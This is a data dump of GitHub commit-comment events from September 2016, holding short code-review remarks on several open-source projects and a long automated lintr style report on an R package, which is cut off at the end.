{"id":"4561275973","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19016891,"position":1,"line":1,"path":"src/main/webapp/WEB-INF/resources/css/bootstrap-select.min.css","commit_id":"361700cca173972b7fdfff35674f68fd4b301327","created_at":"2016-09-14T11:05:14Z","updated_at":"2016-09-14T11:05:14Z","body":"looks like this is not minified version :)"}},"created_at":"2016-09-14T11:05:14Z"}
{"id":"4561276576","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19016895,"position":207,"line":607,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T11:05:21Z","updated_at":"2016-09-14T11:05:21Z","body":"I predict that we'll see rounding errors due to this float division."}},"created_at":"2016-09-14T11:05:21Z"}
{"id":"4561278941","type":"CommitCommentEvent","actor":{"login":"beaylott"},"repo":{"name":"emoncms/emoncms-docker"},"payload":{"comment":{"id":19016903,"position":18,"line":35,"path":"Dockerfile","commit_id":"ce8232822b7b1dc29d4ef802306f49f7a938401a","created_at":"2016-09-14T11:05:46Z","updated_at":"2016-09-14T11:05:46Z","body":"This was to speed up build. Can revert later."}},"created_at":"2016-09-14T11:05:46Z"}
{"id":"4561279236","type":"CommitCommentEvent","actor":{"login":"shikendon"},"repo":{"name":"BackerFounder/active_merchant_sinopac"},"payload":{"comment":{"id":19016906,"position":null,"line":null,"path":null,"commit_id":"0b9458041baa6edcf32d54cd90322544829e6cd6","created_at":"2016-09-14T11:05:51Z","updated_at":"2016-09-14T11:05:51Z","body":"因為 GET 參數的時候訂單編號是叫 `OrderNO`，但 AutoPush 送通知來的時候卻又叫 `OrderID`，所以乾脆就讓兩個互相建立對方一份，不然 Presenter 那邊 `merchant_trade_no` 會有兩種狀況真的不知道怎麼寫..."}},"created_at":"2016-09-14T11:05:51Z"}
{"id":"4561281587","type":"CommitCommentEvent","actor":{"login":"beaylott"},"repo":{"name":"emoncms/emoncms-docker"},"payload":{"comment":{"id":19016922,"position":29,"line":44,"path":"Dockerfile","commit_id":"ce8232822b7b1dc29d4ef802306f49f7a938401a","created_at":"2016-09-14T11:06:27Z","updated_at":"2016-09-14T11:06:27Z","body":"also speed up build (as not being copied above need to do manually after clonging git repos)"}},"created_at":"2016-09-14T11:06:27Z"}
{"id":"4561284211","type":"CommitCommentEvent","actor":{"login":"weltling"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19016931,"position":null,"line":null,"path":null,"commit_id":"acc574d76b60d23b48f8fa561084eb859c2e0766","created_at":"2016-09-14T11:07:06Z","updated_at":"2016-09-14T11:07:06Z","body":"Except master of course. Master NEWS is only for the items that are either master only, or if master is temporary declared to the dev branch.\r\n\r\nthanks."}},"created_at":"2016-09-14T11:07:06Z"}
{"id":"4561284498","type":"CommitCommentEvent","actor":{"login":"beaylott"},"repo":{"name":"emoncms/emoncms-docker"},"payload":{"comment":{"id":19016934,"position":40,"line":53,"path":"Dockerfile","commit_id":"ce8232822b7b1dc29d4ef802306f49f7a938401a","created_at":"2016-09-14T11:07:11Z","updated_at":"2016-09-14T11:07:11Z","body":"Remove daemon init ... docker instances dont init so this wont work!"}},"created_at":"2016-09-14T11:07:11Z"}
{"id":"4561286060","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19016936,"position":15,"line":15,"path":"src/org/vitrivr/cineast/core/db/NeuralNetLookup.java","commit_id":"800af9a5026a4094620fcc2304f0dcb8b6454cd5","created_at":"2016-09-14T11:07:34Z","updated_at":"2016-09-14T11:07:34Z","body":"If you want this kind of logic then you first need to introduce a system-wide standard for labels. This would be needed so that this will still work when you have multiple detectors."}},"created_at":"2016-09-14T11:07:34Z"}
{"id":"4561289681","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19016947,"position":52,"line":50,"path":"src/main/java/com/softserverinc/edu/controllers/WorkLogController.java","commit_id":"6f7055dd0a7fd7c893e7870cd9d7a9713bebf584","created_at":"2016-09-14T11:08:31Z","updated_at":"2016-09-14T11:08:31Z","body":"what? :-1: "}},"created_at":"2016-09-14T11:08:31Z"}
{"id":"4561289753","type":"CommitCommentEvent","actor":{"login":"Webbon"},"repo":{"name":"keijokorhonen/mcnutty-website"},"payload":{"comment":{"id":19016948,"position":null,"line":null,"path":null,"commit_id":"2f6d7a1abeb7574617f04d91c345d47fb6172bf9","created_at":"2016-09-14T11:08:32Z","updated_at":"2016-09-14T11:08:32Z","body":"Good job Devin!"}},"created_at":"2016-09-14T11:08:32Z"}
{"id":"4561289790","type":"CommitCommentEvent","actor":{"login":"hothero"},"repo":{"name":"BackerFounder/active_merchant_sinopac"},"payload":{"comment":{"id":19016949,"position":null,"line":null,"path":null,"commit_id":"0b9458041baa6edcf32d54cd90322544829e6cd6","created_at":"2016-09-14T11:08:32Z","updated_at":"2016-09-14T11:08:32Z","body":"如果沒辦法一致，有機會就補個註解吧，不然一時間連看兩個 function 會蠻 confuse 的 XDDD"}},"created_at":"2016-09-14T11:08:32Z"}
{"id":"4561290697","type":"CommitCommentEvent","actor":{"login":"beaylott"},"repo":{"name":"emoncms/emoncms-docker"},"payload":{"comment":{"id":19016951,"position":50,"line":59,"path":"Dockerfile","commit_id":"ce8232822b7b1dc29d4ef802306f49f7a938401a","created_at":"2016-09-14T11:08:47Z","updated_at":"2016-09-14T11:08:47Z","body":"supervisord is process manager that runs in PID 1 on docker instance (sort of takes place of a process manager). Good way of managing runtime behaviour in docker instances (see separate conf file). "}},"created_at":"2016-09-14T11:08:47Z"}
{"id":"4561292188","type":"CommitCommentEvent","actor":{"login":"hmunfru"},"repo":{"name":"telefonicaid/fiware-aiakos"},"payload":{"comment":{"id":19016956,"position":null,"line":null,"path":null,"commit_id":"31801b56a5fa2a092a07912567de953a4e03f1e8","created_at":"2016-09-14T11:09:10Z","updated_at":"2016-09-14T11:09:10Z","body":"LGTM"}},"created_at":"2016-09-14T11:09:10Z"}
{"id":"4561293339","type":"CommitCommentEvent","actor":{"login":"beaylott"},"repo":{"name":"emoncms/emoncms-docker"},"payload":{"comment":{"id":19016958,"position":5,"line":9,"path":"docker-compose.override.yml","commit_id":"ce8232822b7b1dc29d4ef802306f49f7a938401a","created_at":"2016-09-14T11:09:26Z","updated_at":"2016-09-14T11:09:26Z","body":"This is to do with my particular config ... can be changed."}},"created_at":"2016-09-14T11:09:26Z"}
{"id":"4561295480","type":"CommitCommentEvent","actor":{"login":"beaylott"},"repo":{"name":"emoncms/emoncms-docker"},"payload":{"comment":{"id":19016966,"position":37,"line":140,"path":"docker.settings.php","commit_id":"ce8232822b7b1dc29d4ef802306f49f7a938401a","created_at":"2016-09-14T11:09:59Z","updated_at":"2016-09-14T11:09:59Z","body":"should revert"}},"created_at":"2016-09-14T11:09:59Z"}
{"id":"4561295544","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19016968,"position":38,"line":38,"path":"src/main/java/com/softserverinc/edu/forms/WorkLogFormValidator.java","commit_id":"6f7055dd0a7fd7c893e7870cd9d7a9713bebf584","created_at":"2016-09-14T11:09:59Z","updated_at":"2016-09-14T11:09:59Z","body":"em.... please refactor this:\r\n`a>1?true:false`\r\nis the same:\r\n`a>1`\r\n"}},"created_at":"2016-09-14T11:09:59Z"}
{"id":"4561297625","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19016975,"position":40,"line":40,"path":"src/main/java/com/softserverinc/edu/forms/WorkLogFormValidator.java","commit_id":"6f7055dd0a7fd7c893e7870cd9d7a9713bebf584","created_at":"2016-09-14T11:10:29Z","updated_at":"2016-09-14T11:10:29Z","body":"maybe better:\r\n`LOGGER.error(e.toString(), e);`"}},"created_at":"2016-09-14T11:10:29Z"}
{"id":"4561298009","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":19016976,"position":16,"line":21,"path":"media-libs/libpng/libpng16-1.6.25.recipe","commit_id":"19fc7bdc83faf29666d0bf8f3800f4503adedae5","created_at":"2016-09-14T11:10:35Z","updated_at":"2016-09-14T11:10:35Z","body":"Oops, sorry, thanks. Will fix it asap."}},"created_at":"2016-09-14T11:10:35Z"}
{"id":"4561299948","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19016985,"position":null,"line":null,"path":null,"commit_id":"924817fada41948af9f33fb1581de73076fe23bc","created_at":"2016-09-14T11:11:03Z","updated_at":"2016-09-14T11:11:03Z","body":"[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[R/ABC_SMC.R:19:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \t#Just checking\n  ^\n```\n[R/ABC_SMC.R:20:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \tstop(\"mcmc_nltt: \", \n  ^\n```\n[R/ABC_SMC.R:21:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \t \"initial parameter values have to be above zero\\n\",\n  ^\n```\n[R/ABC_SMC.R:22:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​  \t \"but mu was \",parameters[2],\" instead\")\n  ^\n```\n[R/ABC_SMC.R:67:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        new_pp        <- likelihood_function(parameters, phy)\n^\n```\n[R/ABC_SMC.R:68:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/ABC_SMC.R:69:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        #accept or reject\n^\n```\n[R/ABC_SMC.R:70:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L70) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        if ( is.finite(new_pp) &&\n^\n```\n[R/ABC_SMC.R:71:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L71) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t          is.finite(hr) &&\n^\n```\n[R/ABC_SMC.R:72:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t          new_pp - pp + hr > log(stats::runif(1, 0, 1)) ) {\n^\n```\n[R/ABC_SMC.R:73:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t          pp <- new_pp\n^\n```\n[R/ABC_SMC.R:74:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        } else {\n^\n```\n[R/ABC_SMC.R:75:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t          parameters[j] <- eta\n^\n```\n[R/ABC_SMC.R:76:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L76) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t        }\n^\n```\n[R/ABC_SMC.R:77:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    } else {\n^\n```\n[R/ABC_SMC.R:78:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    \t\tparameters[j] <- eta\n^\n```\n[R/ABC_SMC.R:78:6:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    \t\tparameters[j] <- eta\n     ^~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/ABC_SMC.R:280:26:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​  #check data type of phy \n                         ^\n```\n[R/ABC_SMC.R:287:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L287) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:293:5:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L293) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(parameters[2] < 0) {\n    ^\n```\n[R/ABC_SMC.R:295:23:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L295) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \tstop(\"mcmc_nltt: \", \n                      ^\n```\n[R/ABC_SMC.R:340:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L340) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:341:11:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L341) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n          ^\n```\n[R/ABC_SMC.R:341:52:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L341) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n                                                   ^\n```\n[R/ABC_SMC.R:341:53:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L341) *style:* **Trailing whitespace is superfluous.**\n```r\n​        if(parameters[j] >= 0 & parameters[1] > 0) {        \n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:342:31:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L342) *style:* **Put spaces around all infix operators.**\n```r\n​\t        new_pp        <- likelihood_function(parameters, phy)\n                             ~^~~\n```\n[R/ABC_SMC.R:343:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L343) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/ABC_SMC.R:345:20:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L345) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t        if ( is.finite(new_pp) &&\n                   ^\n```\n[R/ABC_SMC.R:347:26:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L347) *style:* **Put spaces around all infix operators.**\n```r\n​\t          new_pp - pp + hr > log(stats::runif(1, 0, 1)) ) {\n                         ^~\n```\n[R/ABC_SMC.R:347:31:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L347) *style:* **Put spaces around all infix operators.**\n```r\n​\t          new_pp - pp + hr > log(stats::runif(1, 0, 1)) ) {\n                              ^~\n```\n[R/ABC_SMC.R:347:36:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L347) *style:* **Put spaces around all infix operators.**\n```r\n​\t          new_pp - pp + hr > log(stats::runif(1, 0, 1)) ) {\n                                  ~^~\n```\n[R/ABC_SMC.R:348:22:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/R/ABC_SMC.R#L348) *style:* **Put spaces around all infix operators.**\n```r\n​\t          pp <- new_pp\n                    ~^~~\n```\n[tests/testthat/test_calculate_weight.R:2:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tweights <- rep(1, 2);\n^\n```\n[tests/testthat/test_calculate_weight.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tparticles <- list();\n^\n```\n[tests/testthat/test_calculate_weight.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:2) {\n^\n```\n[tests/testthat/test_calculate_weight.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tparticles[[i]] <- c(10, 10)\n^~\n```\n[tests/testthat/test_calculate_weight.R:5:17:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​\tweights <- rep(1, 2);\n               ~^\n```\n[tests/testthat/test_calculate_weight.R:6:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_calculate_weight.R:6:19:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​\tparticles <- list();\n                 ~^~~\n```\n[tests/testthat/test_calculate_weight.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tsigma <- 1;\n^\n```\n[tests/testthat/test_calculate_weight.R:7:12:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:2) {\n           ^\n```\n[tests/testthat/test_calculate_weight.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tprior_density_function <- function(x) {\n^\n```\n[tests/testthat/test_calculate_weight.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[1], min=0, max=1000) *\n^~\n```\n[tests/testthat/test_calculate_weight.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n^~\n```\n[tests/testthat/test_calculate_weight.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:11:32:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tprior_density_function <- function(x) {\n                              ~^~~\n```\n[tests/testthat/test_calculate_weight.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~\n```\n[tests/testthat/test_calculate_weight.R:13:46:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L13) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n                                             ^\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:15:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L16) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:16:61:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:16:90:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L16) *style:* **Commented code should be removed.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                                                         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L17) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:61:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L18) *style:* **Use two spaces to indent, never 